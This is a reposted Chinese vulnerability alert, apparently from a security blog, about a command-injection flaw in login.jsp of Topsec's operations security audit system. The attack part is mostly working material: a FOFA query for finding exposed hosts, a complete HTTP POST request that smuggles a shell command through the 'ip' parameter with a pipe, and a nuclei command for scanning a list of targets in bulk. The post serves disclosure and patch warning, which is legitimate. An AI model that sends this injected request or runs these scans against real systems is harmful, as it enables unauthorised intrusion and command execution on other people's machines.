天融信运维安全审计系统 login.jsp存在命令执行漏洞

admin 2024年9月20日13:36:32评论66 views字数 578阅读1分55秒阅读模式

0x02 漏洞描述

天融信运维安全审计系统 login.jsp存在命令执行漏洞(官方已修复)。

天融信运维安全审计系统 login.jsp存在命令执行漏洞

0x03 漏洞复现

fofa:header="iam" && server="Apache-Coyote/"

1.执行poc进行echo无害操作,得到结果

POST /iam/synRequest.do;.login.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 67Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipmethod=trace_route&w=1&ip=127.0.0.1|echo%20B2a670e17079fD8d%3b&m=10

天融信运维安全审计系统 login.jsp存在命令执行漏洞

2.nuclei验证脚本已发布于知识星球

nuclei.exe -t  topsec-topsag-login-rce.yaml -l subs.txt -stat

天融信运维安全审计系统 login.jsp存在命令执行漏洞

   

原文始发于微信公众号(融云攻防实验室):漏洞预警 天融信运维安全审计系统 login.jsp存在命令执行漏洞

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月20日13:36:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   天融信运维安全审计系统 login.jsp存在命令执行漏洞https://cn-sec.com/archives/3187474.html

发表评论

匿名网友 填写信息